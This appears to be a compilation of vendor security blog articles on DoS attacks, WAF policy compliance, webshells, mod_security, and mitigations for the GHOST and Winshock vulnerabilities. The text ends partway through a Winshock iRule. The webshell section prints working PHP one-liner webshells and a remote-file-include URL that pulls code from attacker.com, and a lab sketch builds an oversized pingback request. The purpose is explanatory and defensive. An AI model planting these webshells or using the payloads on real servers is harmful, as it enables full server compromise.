application security
Layer 4 vs Layer 7 DoS Attack
Not all DoS (Denial of Service) attacks are the same. While the end result is to consume as much - hopefully all - of a server or site's resources such that legitimate users are denied service (hence the name), there is a subtle difference in how these attacks are perpetrated that makes one easier to stop than the other.

SYN Flood

A Layer 4 DoS attack is often referred to as a SYN flood. It works at the transport protocol (TCP) layer. A TCP connection is established in what is known as a 3-way handshake: the client sends a SYN packet, the server responds with a SYN ACK, and the client responds to that with an ACK. After the three-way handshake is complete, the TCP connection is considered established. It is at this point that applications begin sending data using a Layer 7 or application layer protocol, such as HTTP.

A SYN flood uses the inherent patience of the TCP stack to overwhelm a server by sending a flood of SYN packets and then ignoring the SYN ACKs returned by the server. This causes the server to use up resources waiting a configured amount of time for the anticipated ACK that should come from a legitimate client. Because web and application servers are limited in the number of concurrent TCP connections they can have open, an attacker that sends enough SYN packets to a server can easily chew through the allowed number of TCP connections, preventing legitimate requests from being answered by the server.

SYN floods are fairly easy for proxy-based application delivery and security products to detect. Because they proxy connections for the servers, and are generally hardware-based with a much higher TCP connection limit, proxy-based solutions can handle the high volume of connections without becoming overwhelmed. Because the proxy-based solution usually terminates the TCP connection (i.e. it is the "endpoint" of the connection), it will not pass the connection to the server until it has completed the 3-way handshake. Thus, a SYN flood is stopped at the proxy and legitimate connections are passed on to the server with alacrity.

Attackers are generally stopped from flooding the network through the use of SYN cookies. SYN cookies utilize cryptographic hashing and are therefore computationally expensive, making it desirable to let a proxy/delivery solution with hardware-accelerated cryptographic capabilities handle this type of security measure. Servers can implement SYN cookies, but the additional burden placed on the server erodes much of the gain achieved by preventing SYN floods and often results in available, but unacceptably slow, servers and sites.
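To make the SYN cookie idea concrete, here is a minimal sketch in Python of one simplified encoding. It is illustrative only (real implementations, such as the Linux kernel's, also pack the negotiated MSS into the value and use a tighter bit layout), and the secret and helper names are hypothetical:

```python
# Minimal sketch of the SYN-cookie idea, under simplifying assumptions.
# The server derives its initial sequence number (ISN) from the connection
# 4-tuple, a coarse timestamp, and a secret instead of allocating state.
import hashlib
import hmac
import time

SECRET = b"rotate-me-periodically"  # hypothetical server-side secret

def _cookie(src_ip: str, src_port: int, dst_ip: str, dst_port: int, slot: int) -> int:
    msg = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}|{slot}".encode()
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:4], "big")

def make_syn_cookie(src_ip: str, src_port: int, dst_ip: str, dst_port: int) -> int:
    """ISN for the SYN-ACK, bound to the 4-tuple and a 64-second time slot."""
    return _cookie(src_ip, src_port, dst_ip, dst_port, int(time.time()) >> 6)

def check_syn_cookie(ack: int, src_ip: str, src_port: int,
                     dst_ip: str, dst_port: int, max_slots: int = 2) -> bool:
    """A legitimate client ACKs our ISN + 1; recompute over recent time slots."""
    now = int(time.time()) >> 6
    return any((ack - 1) & 0xFFFFFFFF == _cookie(src_ip, src_port, dst_ip, dst_port, s)
               for s in range(now, now - max_slots, -1))
```

The point is that a returning ACK can be validated by recomputing a hash from the packet itself, so no per-connection state is held while the handshake is half-open, which is exactly the resource a SYN flood tries to exhaust.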
HTTP GET DoS

A Layer 7 DoS attack is a different beast, and it's more difficult to detect. A Layer 7 DoS attack is often perpetrated through the use of HTTP GET. This means that the 3-way TCP handshake has been completed, thus fooling devices and solutions which are only examining layer 4 and TCP communications. The attacker looks like a legitimate connection and is therefore passed on to the web or application server. At that point the attacker begins requesting large numbers of files/objects using HTTP GET. They are generally legitimate requests; there are just a lot of them. So many, in fact, that the server quickly becomes focused on responding to those requests and has a hard time responding to new, legitimate requests.

When rate-limiting was used to stop this type of attack, the bad guys moved to using a distributed system of bots (zombies) to ensure that the requests (the attack) were coming from myriad IP addresses, making the attack not only more difficult to detect but more difficult to stop. The attacker uses malware and trojans to deposit a bot on servers and clients, and then remotely includes them in his attack by instructing the bots to request a list of objects from a specific site or server. The attacker might not use bots at all, but instead might gather enough evil friends to launch an attack against a site that has annoyed them for some reason.

Layer 7 DoS attacks are more difficult to detect because the TCP connection is valid and so are the requests. The trick is to realize when there are multiple clients requesting large numbers of objects at the same time and to recognize that it is, in fact, an attack. This is tricky because there may very well be legitimate requests mixed in with the attack, which means a "deny all" philosophy will result in the very situation the attackers are trying to force: a denial of service.

Defending against Layer 7 DoS attacks usually involves some sort of rate-shaping algorithm that watches clients and ensures that they request no more than a configurable number of objects per time period, usually measured in seconds or minutes. If the client requests more than the configurable number, the client's IP address is blacklisted for a specified time period and subsequent requests are denied until the address has been freed from the blacklist (a toy sketch of this approach appears at the end of this article). Because this can still affect legitimate users, layer 7 firewall (application firewall) vendors are working on ways to get smarter about stopping layer 7 DoS attacks without affecting legitimate clients. It is a subtle dance and requires a bit more understanding of the application and its flow, but if implemented correctly it can improve the ability of such devices to detect and prevent layer 7 DoS attacks from reaching web and application servers and taking a site down.

The goal of deploying an application firewall or proxy-based application delivery solution is to ensure the fast and secure delivery of an application. By preventing both layer 4 and layer 7 DoS attacks, such solutions allow servers to continue serving up applications without a degradation in performance caused by dealing with layer 4 or layer 7 attacks.
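As promised above, here is a toy illustration of the rate-shaping-and-blacklist approach in Python. The thresholds and the in-memory store are hypothetical; a real enforcement point would implement this in optimized data structures on the proxy, not in application code:

```python
# Toy sketch of rate-limiting with a temporary blacklist: allow at most
# MAX_REQUESTS per client IP per sliding window; offenders are blocked
# for BLACKLIST_SECONDS. All values are illustrative assumptions.
import time
from collections import defaultdict, deque

MAX_REQUESTS = 100       # allowed requests per window (hypothetical)
WINDOW_SECONDS = 60      # sliding window length
BLACKLIST_SECONDS = 300  # how long an offending IP stays blocked

request_log: dict[str, deque] = defaultdict(deque)
blacklist: dict[str, float] = {}

def allow_request(client_ip: str) -> bool:
    now = time.monotonic()
    # Deny while the client is blacklisted; free it once the period expires.
    if client_ip in blacklist:
        if now < blacklist[client_ip]:
            return False
        del blacklist[client_ip]
    # Drop timestamps that have fallen out of the sliding window.
    window = request_log[client_ip]
    while window and now - window[0] > WINDOW_SECONDS:
        window.popleft()
    window.append(now)
    # Exceeding the per-window budget earns a temporary blacklisting.
    if len(window) > MAX_REQUESTS:
        blacklist[client_ip] = now + BLACKLIST_SECONDS
        return False
    return True
```

Note how this naive version reproduces the weakness described above: a distributed attack spreads requests across many IPs so that no single client exceeds the threshold, which is why vendors layer smarter, application-aware detection on top.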
Making WAF Simple: Introducing the OWASP Compliance Dashboard

Whether you are a beginner or an expert, there is a truth that I want to let you in on: building and maintaining Web Application Firewall (WAF) security policies can be challenging. How much security do you really need? Is your configuration too much or too little? Have you created an operational nightmare? Many well-intentioned administrators will initially enable every available feature, thinking that it is providing additional security to the application, when in truth, it is hindering it. How, you may ask? False positives and noise. The more noise and false positives, the harder it becomes to find the real attacks, and the greater the likelihood that you begin disabling features that ARE providing essential security for your applications.

So… less is better then? That isn't the answer either; what good are our security solutions if they aren't protecting against anything? The key to success, and what we will look at further in this article, is implementing best practice controls that are both measurable and manageable for your organization. The OWASP Application Security Top 10 is a well-respected list of the ten most prevalent and dangerous application layer attacks that you almost certainly should protect your applications from. By first focusing your security controls on the items in the OWASP Top 10, you are improving the manageability of your security solution and getting the most "bang for your buck". Now, the challenge is: how do you take such a list and build real security protections for your applications?

Introducing the OWASP Compliance Dashboard

Protecting your applications against the OWASP Top 10 is not a new thing; in fact, many organizations have been taking this approach for quite some time. The challenge is that most implementations that claim to "protect" against the OWASP Top 10 rely solely on signature-based protections for only a small subset of the list and provide zero insight into your compliance status. The OWASP Compliance Dashboard, introduced in version 15.0 on BIG-IP Advanced WAF, reinvents this idea by providing a holistic and interactive dashboard that clearly measures your compliancy against the OWASP Application Security Top 10. The Top 10 is then broken down into specific security protections, including both positive and negative security controls, which can be enabled, disabled, or ignored directly on the dashboard.

We realize that a WAF policy alone may not provide complete protection across the OWASP Top 10; this is why the dashboard also includes the ability to review and track the compliancy of best practices outside the scope of a WAF alone, such as whether the application is subject to routine patching or vulnerability scanning.

To illustrate this, let's assume I have created a brand new WAF policy using the Rapid Deployment policy template and accepted all default settings. What compliance score do you think this policy might have? Let's take a look.

Interesting. The policy is 0/10 compliant, and only A2 Broken Authentication and A3 Sensitive Data Exposure have partial compliance. Why is that? The Rapid Deployment template should include some protections by default, shouldn't it? Expanding A1 Injection, we see a list of protections required in order to be marked as compliant. Hovering over the list of attack signatures, we see that each category of signature is in 'Staging' mode, aha! Signatures in staging mode are not enforced and therefore cannot block traffic. Until the signature set is enforced, we do not mark that protection as compliant.
For those of you who have mistakenly left entities such as signatures in staging for longer than desired, this is also a GREAT way to quickly find them. I also told you we could interact with the dashboard to influence the compliancy score, so let's demonstrate that. Each item can be enforced DIRECTLY on the dashboard by selecting the "Enforce" checkmark on the right. No need to go into multiple menus; you can enforce all these security settings on a single page and preview the compliance status immediately. If you are happy with your selection, click on "Review & Update" to perform a final review of what the dashboard will be configuring on your behalf before you can click on "Save & Apply Policy".

Note: Enforcing signatures before a period of staging may not be a good idea depending on your environment. Staging provides a period to assess signature matches in order to eliminate false positives. Enforcing these signatures too quickly could result in the denying of legitimate traffic.

Let's review the compliancy of our policy now with these changes applied. As you can see, A1 Injection is now 100% compliant, and other categories have also had their scores updated as a result of enforcing these signatures. The reason for this is that there is overlap in the security controls applied across these other categories.

Not all security controls can be fully implemented directly via the dashboard, and as mentioned previously, not all security controls are signature-based. A7 Cross-Site Scripting was recalculated as 50% compliant with the signatures we enforced previously, so let's take a look at what else is required for full compliancy. The options available to us are to IGNORE the requirement, meaning we will be granted full compliancy for that item without implementing any protection, or to manually configure the protection referenced. We may want to ignore a protection if it is not applicable to the application or if it is not in scope for your deployment. Be mindful that ignoring an item means you are potentially misrepresenting the score of your policy; be very certain that the protection you are ignoring is in fact not applicable before doing so. I've selected to ignore the requirement for "Disallowed Meta Characters in Parameters" and my policy is now 100% compliant for A7 Cross-Site Scripting (XSS).

Lastly, we will look at items within the dashboard that fall outside the scope of WAF protections. Under A9 Using Components with Known Vulnerabilities, we are presented with a series of best practices such as "Application and system hardening", "Application and system patching" and "Vulnerability scanner integration". Using the dashboard, you can click on the checkmark to the right for "Requirement fulfilled" to indicate that your organization implements these best practices. By doing so, the OWASP Compliance score updates, providing you with real-time visibility into the compliancy for your application.

Conclusion

The OWASP Compliance Dashboard on BIG-IP Advanced WAF is a perfect fit for the security administrator looking to fine-tune and measure either existing or new WAF policies against the OWASP App Security Top 10. The OWASP Compliance Dashboard not only tracks WAF-specific security protections but also includes general best practices, allowing you to use the dashboard as your one-stop shop to measure the compliancy of ALL your applications.
For many applications, protection against the OWASP Top 10 may be enough, as it provides you with best practices to follow without having to worry about which features to implement and where. Note: Keep in mind that some applications may require additional controls beyond the protections included in the OWASP Top 10 list.

For teams heavily embracing automation and CI/CD pipelines, logging into a GUI to perform changes likely does not sound appealing. In that case, I suggest reading more about our Declarative Advanced WAF policy framework, which can be used to represent WAF policies in any CI/CD pipeline (a rough sketch appears after the links below). Combine this with the OWASP Compliance Dashboard for an at-a-glance assessment of your policy and you have the best of both worlds.

If you're not already using the OWASP Compliance Dashboard, what are you waiting for? Look out for Bill Brazill, Victor Granic and myself (Kyle McKay) on June 10th at F5 Agility 2020, where we will be presenting and facilitating a class called "Protecting against the OWASP Top 10". In this class, we will be showcasing the OWASP Compliance Dashboard on BIG-IP Advanced WAF further and providing ample hands-on time fine-tuning and measuring WAF policies for OWASP compliance. Hope to see you there! To learn more, visit the links below.

Links

OWASP Compliance Dashboard: https://support.f5.com/csp/article/K52596282
OWASP Application Security Top 10: https://owasp.org/www-project-top-ten/
Agility 2020: https://www.f5.com/agility/attend
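As promised, here is a rough idea of what a declarative policy can look like. The exact schema belongs to the official documentation linked above; the property names and values shown here (policy name, template, staging flag) are illustrative assumptions, not an authoritative reference:

```json
{
  "policy": {
    "name": "owasp_top10_policy",
    "template": { "name": "POLICY_TEMPLATE_RAPID_DEPLOYMENT" },
    "enforcementMode": "blocking",
    "signature-settings": { "signatureStaging": false }
  }
}
```

A policy expressed this way can be kept in source control, reviewed like any other code change, and pushed through a pipeline, while the dashboard remains available for measuring the result.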
Webshells

Webshells are web scripts (PHP/ASPX/etc.) that act as a control panel for the server running them. A webshell may be legitimately used by an administrator to perform actions on the server, such as:

- Create a user
- Restart a service
- Clean up disk space
- Read logs
- More…

Therefore, a webshell simplifies server management for administrators who are not familiar with (or are less comfortable with) internal system commands using the console. However, webshells have bad connotations as well – they are a very popular post-exploitation tool that allows an attacker to gain full system control.

Webshell Examples

An example of a webshell may be as simple as the following script:

```php
<?php echo(system($_GET["q"])); ?>
```

This script will read a user-provided value and pass it on to the underlying operating system as a shell command. For instance, issuing the following request will invoke the 'ls' command and print the result to the screen:

http://example.com/webshell.php?q=ls

An even simpler example of a webshell may be this:

```php
<?php eval($_GET["q"]); ?>
```

This script will simply take the contents of the parameter "q" and evaluate it as pure PHP code. Example:

http://example.com/webshell.php?q=echo%20("hello%20world")%3B

From this point, the options are limitless. An attacker that uses a webshell on a compromised server effectively has full control over the application. If the web application is running under root, the attacker has full control over the entire web server as well. In many cases, the neighboring servers on the local network are at risk too.

How does a webshell attack work?

We've now seen that a webshell script is a very powerful tool. However, a webshell is a "post-exploitation" tool – meaning an attacker first has to find a vulnerability in the web application, exploit it, and upload their webshell onto the server. One way to achieve this is by first uploading the webshell through a legitimate file upload page (for instance, a CV submission form on a company website) and then using an LFI (Local File Include) weakness in the application to include the webshell in one of the pages. A different approach may be an application vulnerable to arbitrary file write: an attacker may simply write the code to a new file on the server. Another example may be an RFI (Remote File Include) weakness in the application that effectively eliminates the need to upload the webshell onto the server. An attacker may host the webshell on a completely different server, and force the application to include it, like this:

http://vulnerable.com/rfi.php?include=http://attacker.com/webshell.php

The b374k webshell

There are many and varied implementations of webshells. As mentioned, these are not always meant to be used by attackers, but also by system administrators. Some of the "suspicious" webshells that are more popular with attackers are the following:

- c99
- r57
- c100
- PHPjackal
- Locus

In this article we will explore an open source webshell called b374k (https://github.com/b374k/b374k). From the readme: "This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel, connecting using ssh, ftp etc. All actions take place within a web browser."

Features:

- File manager (view, edit, rename, delete, upload, download, archiver, etc)
- Search file, file content, folder (also using regex)
- Command execution
- More…

Once we get the webshell up and running, we can view information and perform actions on the server.
Listed below are a few use cases for this webshell that demonstrate the power of webshells and how attackers can benefit from running them on a compromised web server:

- View process information and varied system information.
- Open a terminal and execute various commands, or open a code evaluator to run arbitrary code.
- Open a reverse shell on the server, to make sure access to the server is preserved.
- Issue outgoing HTTP requests from the server.
- Perform social engineering activities to broaden the scope of the attack.

Mitigation using F5 ASM

The F5 ASM module uses detection and prevention methods for each variation of this attack:

- For RFI (Remote File Include): ASM will detect any request that attempts to include an external URL, and prevent access.
- For Unrestricted File Upload + LFI (Local File Include): During an upload or creation attempt of the webshell, ASM will detect the active code and prevent it from reaching the server (a naive illustration follows this list).
- If the webshell is already on the server, ASM will detect when the application tries to reach the file using LFI and prevent access.
- If the webshell is already on the server and part of the application, ASM will detect when a suspicious page is requested, and prevent that page from being displayed.
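To illustrate the "detect active code during upload" idea from the list above in the simplest possible terms, here is a naive sketch. This is emphatically not how ASM works internally; the marker list and helper name are hypothetical, and a check this crude would be trivially evadable on its own:

```python
# Naive illustration only: flag uploaded content that carries telltale
# active-code markers before it is written to the server. Real WAF engines
# use far richer parsing and signatures than a substring scan.
SUSPICIOUS_MARKERS = [b"<?php", b"<%", b"eval(", b"system(", b"exec("]

def looks_like_webshell(upload: bytes) -> bool:
    data = upload.lower()
    return any(marker in data for marker in SUSPICIOUS_MARKERS)

print(looks_like_webshell(b'<?php eval($_GET["q"]); ?>'))  # True
print(looks_like_webshell(b"%PDF-1.7 ... harmless resume ..."))  # False
```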
4 reasons not to use mod-security

Apache is a great web server, if for no other reason than that it offers more flexibility through modules than just about any other web server. You can plug in all sorts of modules to enhance the functionality of Apache. But as I often say, just because you can doesn't mean you should. One of the modules you can install is mod_security. If you aren't familiar with mod_security, essentially it's a "roll your own" web application firewall plug-in for the Apache web server. Some of the security functions you can implement via mod_security are:

- Simple filtering
- Regular expression based filtering
- URL encoding validation
- Unicode encoding validation
- Auditing
- Null byte attack prevention
- Upload memory limits
- Server identity masking
- Built-in chroot support

Using mod_security you can also implement protocol security, which is an excellent idea for ensuring that holes in protocols aren't exploited. If you aren't sold on protocol security you should read up on the recent DNS vulnerability discovered by Dan Kaminsky - it's all about the protocol and has nothing to do with vulnerabilities introduced by implementation. mod_security provides many options for validating URLs, URIs, and application data. You are, essentially, implementing a custom web application firewall using configuration directives.

If you're on this path then you probably agree that a web application firewall is a good thing, so why would I caution against using mod_security? Well, there are actually four reasons:

1. It runs on every web server. This is an additional load on the servers that can be easily offloaded for a more efficient architecture. The need for partial duplication of configuration files across multiple machines can also result in the introduction of errors or extraneous, unnecessary configuration. Running mod_security on every web server decreases capacity to serve users and applications accordingly, which may require additional servers to scale to meet demand.

2. You have to become a security expert. You have to understand the attacks you are trying to stop in order to write a rule to prevent them. So either you become an expert or you trust a third party to be the expert. The former takes time and the latter takes guts, as you're introducing unnecessary risk by trusting a third party.

3. You have to become a protocol expert. In addition to understanding all the attacks you're trying to prevent, you must become an expert in the HTTP protocol. Part of providing web application security is to sanitize and enforce the HTTP protocol to ensure it isn't abused to create a hole where none previously appeared. You also have to become an expert in Apache configuration directives, and the specific directives used to configure mod_security.

4. The configuration must be done manually. Unless you're going to purchase a commercially supported version of mod_security, you're writing complex rules manually (see the sketch after this list). You'll need to brush up on your regular expression skills if you're going to attempt this. Maintaining those rules is just as painful, as any update necessarily requires manual intervention.
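To give a sense of what "writing complex rules manually" means in practice, here is a small, hypothetical mod_security rule of the kind you would have to author and maintain yourself. The pattern and rule metadata are illustrative only, and a single crude regex like this is exactly the sort of rule that generates false positives:

```apache
# Hypothetical hand-written rule: deny requests whose arguments match a
# crude SQL injection pattern. Every such rule, its regex, and its
# lifecycle must be authored, tested, and updated manually on each server.
SecRuleEngine On

SecRule ARGS "@rx (?i:union\s+select|select\s+.+\s+from)" \
    "id:100001,phase:2,deny,status:403,log,msg:'Possible SQL injection'"
```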
Of course you could introduce an additional instance of Apache with mod_security installed that essentially proxies all requests through mod_security, thus providing a centralized security architecture, but at that point you've just introduced a huge bottleneck into your infrastructure. If you're already load-balancing multiple instances of a web site or application, then it's not likely that a single instance of Apache with mod_security is going to be able to handle the volume of requests without increasing downtime or degrading performance such that applications might as well be down because they're too painful to use.

Centralizing security can improve performance, reduce the potential avenues of risk through configuration error, and keep your security up to date by providing easy access to updated signatures, patterns, and defenses against existing and emerging web application attacks. Some web application firewalls offer pre-configured templates for specific applications like Microsoft OWA, providing a simple configuration experience that belies the depth of security knowledge applied to protecting the application. Web application firewalls can enable compliance with requirement 6.6 of PCI DSS. And they're built to scale, which means the scenario in which mod_security is used as a reverse proxy to protect all web servers from harm but quickly becomes a bottleneck and impediment to performance doesn't happen with purpose-built web application firewalls.

If you're considering using mod_security then you already recognize the value of and need for a web application firewall. That's great. But consider carefully where you will deploy that web application firewall, because the decision will have an impact on the performance and availability of your site and applications.
GHOST Vulnerability (CVE-2015-0235)

On 27 January, Qualys published a critical vulnerability dubbed "GHOST", so named because it can be triggered by the GetHOST functions ( gethostbyname*() ) of the glibc library shipping with the Linux kernel. Glibc is the main library of C language functionality and is present on most Linux distributions. Those functions are used to get a corresponding structure out of a supplied hostname, and also perform a DNS lookup if the hostname is a domain name rather than an IP address. The vulnerable functions are obsolete but are still in use by many popular applications such as Apache, MySQL, Nginx and Node.js. Presently this vulnerability has been proven remotely exploitable only for the Exim mail service, while arbitrary code execution on any other system using those vulnerable functions is very context-dependent. Qualys mentioned, through a security email list, the applications that were investigated but found not to contain the buffer overflow. Read more on the email list archive link below:

http://seclists.org/oss-sec/2015/q1/283

Currently, F5 is not aware of any vulnerable web application, although PHP applications might be potentially vulnerable due to PHP's "gethostbyname()" equivalent.

UPDATE: The WordPress content management system, via its xml-rpc pingback functionality, was found to be vulnerable to the GHOST vulnerability. WordPress automatically notifies popular Update Services that you've updated your blog by sending a XML-RPC ping each time you create or update a post. By sending a specially crafted hostname as a parameter of the xml-rpc pingback method, a vulnerable WordPress will return a "500" HTTP response, or no response at all, as a result of memory corruption. However, no exploitability has been proven yet.

Using ASM to Mitigate the WordPress GHOST Exploit

As the crafted hostname needs to be around 1000 characters to trigger the vulnerability, limiting request size will mitigate the threat. Add the following user-defined attack signature to detect and prevent potential exploitation of this specific vulnerability on WordPress systems (a lab sketch for generating such a request appears at the end of this article).

For versions greater than 11.2.x:

```
uricontent:"xmlrpc.php"; objonly; nocase; content:"methodcall"; nocase; re2:"/https?://(?:.*?)?[\d\.]{500}/i";
```

For versions below 11.2.x:

```
uricontent:"xmlrpc.php"; objonly; nocase; content:"methodcall"; nocase; pcre:"/https?://(?:.*?)?[\d\.]{500}/i";
```

This signature will catch any request to the "xmlrpc.php" URL which contains an IPv4-format hostname longer than 500 characters.

iRule Mitigation for the Exim GHOST Exploit

At this time, only Exim mail servers are known to be remotely exploitable, and only if configured to verify hosts after the EHLO/HELO command in an SMTP session. If you run the Exim mail server behind a BIG-IP, the following iRule will detect and mitigate exploitation attempts:

```tcl
when CLIENT_ACCEPTED {
    TCP::collect
}
when CLIENT_DATA {
    if { ( [string toupper [TCP::payload]] starts_with "HELO " or
           [string toupper [TCP::payload]] starts_with "EHLO " ) and
         ( [TCP::payload length] > 1000 ) } {
        log local0. "Detected GHOST exploitation attempt"
        TCP::close
    }
    TCP::release
    TCP::collect
}
```

This iRule will catch any HELO/EHLO command greater than 1000 bytes. Create a new iRule and attach it to your virtual server.
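Returning to the WordPress signature above: to sanity-check it in a lab, one can generate a pingback request whose source URI contains an IPv4-style hostname of well over 500 digits and dots. Below is a minimal sketch with a hypothetical target host; test only against systems you own:

```python
# Lab-only sketch: craft an XML-RPC pingback body whose source URI carries
# an IPv4-style hostname of ~1000 digits and dots, the exact pattern the
# ASM signature above is written to catch. The target host is hypothetical.
long_host = "1." * 500  # 1000 characters consisting only of digits and dots
body = (
    '<?xml version="1.0"?>'
    "<methodCall><methodName>pingback.ping</methodName><params>"
    f"<param><value><string>http://{long_host}/post</string></value></param>"
    "<param><value><string>http://wp.example/blog/?p=1</string></value></param>"
    "</params></methodCall>"
)
# POST this body to http://wp.example/xmlrpc.php and confirm the request
# is blocked (or, on an unpatched server, returns a 500 / no response).
```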
Mitigating Winshock (CVE-2014-6321) Vulnerabilities Using BIG-IP iRules

Recently we've witnessed yet another earth-shattering vulnerability in a popular and very fundamental service. Dubbed Winshock, it joins Heartbleed, Shellshock and POODLE in the pantheon of critical vulnerabilities discovered in 2014. Winshock (CVE-2014-6321) earns a 10.0 CVSS score because it affects a service as common as TLS and potentially allows remote arbitrary code execution.

SChannel

From MSDN: "Secure Channel, also known as Schannel, is a security support provider (SSP) that contains a set of security protocols that provide identity authentication and secure, private communication through encryption." Basically, SChannel is Microsoft's implementation of TLS, and it is used in various MS-related services that support encryption and authentication, such as Internet Information Services (IIS), Remote Desktop Protocol, Exchange and Outlook Web Access, SharePoint, Active Directory and more. Naturally, SChannel also contains an implementation of the TLS handshake protocol, which is performed before every secure session is established between the client and the server.

The TLS Handshake

[Figure: a typical TLS handshake. Image source: http://www-01.ibm.com/support/knowledgecenter/SSFKSJ_7.1.0/com.ibm.mq.doc/sy10660_.htm?lang=en]

The handshake is used for the client and the server to agree on the terms of the connection. The handshake is conducted using messages, for the purpose of authenticating the server and the client to each other, agreeing on cipher suites, and exchanging public keys using certificates. Each type of message is passed on the wire as a unique "TLS record". Several messages (TLS records) may be sent over one packet. Some of the known TLS records are the following:

- Client Hello – The client announces it would like to initiate a connection with the server. It also presents all the various cipher suites it can support. This record may also have numerous extensions used to provide even more data.
- Server Hello – The server acknowledges the Client Hello and presents its own information.
- Certificate Request – In some scenarios, the client is required to present its certificate in order to authenticate itself. This is known as two-way authentication (or mutual authentication). The Certificate Request message is sent by the server and forces the client to present a valid certificate before the handshake is successful.
- Certificate – A message used to transfer the contents of a certificate, including subject name, issuer, public key and more.
- Certificate Verify – Contains a value signed using the client's private key. It is presented by the client along with its certificate during a 2-way handshake, and serves as proof that the client actually holds the certificate it claims to.
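For readers who want to see the record layout concretely, here is a minimal Python sketch that parses the 5-byte record header and the handshake message type that follows, much as the mitigation iRule later in this article does with its "binary scan" calls. The constants and sample bytes are illustrative:

```python
# Minimal sketch: parse the 5-byte TLS record header (type, version, length)
# plus the handshake message type byte that follows, per the TLS 1.0-1.2
# record layout. Sample data below is illustrative only.
import struct

HANDSHAKE = 22           # record type for handshake messages
CLIENT_HELLO = 1         # handshake message types checked by the iRule
CERTIFICATE = 11
CERTIFICATE_VERIFY = 15

def parse_record(data: bytes):
    """Return (record_type, version, length, handshake_type) or None."""
    if len(data) < 6:
        return None
    rec_type, version, length = struct.unpack("!BHH", data[:5])
    handshake_type = data[5] if rec_type == HANDSHAKE else None
    return rec_type, version, length, handshake_type

# A Client Hello record header for TLS 1.0 (version 0x0301 == 769, the same
# decimal value the iRule below compares against).
sample = bytes([22, 0x03, 0x01, 0x00, 0x2F, 1]) + b"\x00" * 46
print(parse_record(sample))  # (22, 769, 47, 1)
```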
SChannel Vulnerabilities

Two vulnerabilities were found in the way SChannel handles those TLS records. One vulnerability occurs when parsing the "server_name" extension of the Client Hello message. This extension is typically used to specify the host name which the client is trying to connect to on the target server; in some ways this is similar to the HTTP "Host" header. It was found that SChannel does not properly manage memory allocation when this record contains more than one server name. This vulnerability leads to denial of service by memory exhaustion.

The other vulnerability occurs when an invalid signed value is presented inside a Certificate Verify message. It was found that values larger than what the server expects will be written to memory beyond the allocated buffer's scope. This behavior may result in potential remote code execution.

Mitigation with BIG-IP iRules

SSL offloading using BIG-IP is inherently not vulnerable, as it does not relay vulnerable messages to the backend server. However, in a "pass-through" scenario, where all the TLS handshake messages are forwarded without inspection, backend servers may be vulnerable to these attacks. The following iRule will detect and mitigate attempts to exploit the above SChannel vulnerabilities:

```tcl
when CLIENT_ACCEPTED {
    TCP::collect
    set MAX_TLS_RECORDS 16
    set iPacketCounter 0
    set iRecordPointer 0
    set sPrimeCurve ""
    set iMessageLength 0
}

when CLIENT_DATA {
    #log local0. "New TCP packet. Length [TCP::payload length]. Packet Counter $iPacketCounter"
    set bScanTLSRecords 0
    if { $iPacketCounter == 0 } {
        binary scan [TCP::payload] cSS tls_xacttype tls_version tls_recordlen
        if { [info exists tls_xacttype] && [info exists tls_version] && [info exists tls_recordlen] } {
            if { ($tls_version == "769" || $tls_version == "770" || $tls_version == "771") && $tls_xacttype == 22 } {
                set bScanTLSRecords 1
            }
        }
    }
    if { $iPacketCounter > 0 } {
        # Got here mid record, collect more fragments
        #log local0. "Gather. tls rec $tls_recordlen, ptr $iRecordPointer"
        if { [expr {$iRecordPointer + $tls_recordlen + 5}] <= [TCP::payload length] } {
            #log local0. "Full record received"
            set bScanTLSRecords 1
        } else {
            #log local0. "Record STILL fragmented"
            set iPacketCounter [expr {$iPacketCounter + 1}]
            TCP::collect
        }
    }
    if { $bScanTLSRecords } {
        # Start scanning records
        set bNextRecord 1
        set bKill 0
        while { $bNextRecord >= 1 } {
            #log local0. "Reading next record. ptr $iRecordPointer"
            binary scan [TCP::payload] @${iRecordPointer}cSS tls_xacttype tls_version tls_recordlen
            #log local0. "SSL Record Type $tls_xacttype , Version: $tls_version , Record Length: $tls_recordlen"
            if { [expr {$iRecordPointer + $tls_recordlen + 5}] <= [TCP::payload length] } {
                binary scan [TCP::payload] @[expr {$iRecordPointer + 5}]c tls_action
                if { $tls_xacttype == 22 && $tls_action == 1 } {
                    #log local0. "Client Hello"
                    set iRecordOffset [expr {$iRecordPointer + 43}]
                    binary scan [TCP::payload] @${iRecordOffset}c tls_sessidlen
                    set iRecordOffset [expr {$iRecordOffset + 1 + $tls_sessidlen}]
                    binary scan [TCP::payload] @${iRecordOffset}S tls_ciphlen
                    set iRecordOffset [expr {$iRecordOffset + 2 + $tls_ciphlen}]
                    binary scan [TCP::payload] @${iRecordOffset}c tls_complen
                    set iRecordOffset [expr {$iRecordOffset + 1 + $tls_complen}]
                    binary scan [TCP::payload] @${iRecordOffset}S tls_extenlen
                    set iRecordOffset [expr {$iRecordOffset + 2}]
                    binary scan [TCP::payload] @${iRecordOffset}a* tls_extensions
                    for { set i 0 } { $i < $tls_extenlen } { incr i 4 } {
                        set iExtensionOffset [expr {$i}]
                        binary scan $tls_extensions @${iExtensionOffset}SS etype elen
                        if { ($etype == "00") } {
                            set iScanStart [expr {$iExtensionOffset + 9}]
                            set iScanLength [expr {$elen - 5}]
                            binary scan $tls_extensions @${iScanStart}A${iScanLength} tls_servername
                            if { [regexp \x00 $tls_servername] } {
                                log local0. "Winshock detected - NULL character in host name. Server Name: $tls_servername"
                                set bKill 1
                            } else {
                                #log local0. "Server Name found valid: $tls_servername"
                            }
                            set iExtensionOffset [expr {$iExtensionOffset + $elen}]
                        } else {
                            #log local0. "Uninteresting extension $etype"
                            set iExtensionOffset [expr {$iExtensionOffset + $elen}]
                        }
                        set i $iExtensionOffset
                    }
                } elseif { $tls_xacttype == 22 && $tls_action == 11 } {
                    #log local0. "Certificate"
                    set iScanStart [expr {$iRecordPointer + 17}]
                    set iScanLength [expr {$tls_recordlen - 12}]
                    binary scan [TCP::payload] @${iScanStart}A${iScanLength} client_certificate
                    if { [regexp {\x30\x59\x30\x13\x06\x07\x2a\x86\x48\xce\x3d\x02\x01(\x06\x08\x2a\x86\x48\xce\x3d\x03\x01\x07|\x06\x05\x2b\x81\x04\x00(?:\x22|\x23))} $client_certificate reMatchAll reMatch01] } {
                        #log local0. $reMatch01
                        switch $reMatch01 {
                            "\x06\x08\x2a\x86\x48\xce\x3d\x03\x01\x07" { set sPrimeCurve "P-256" }
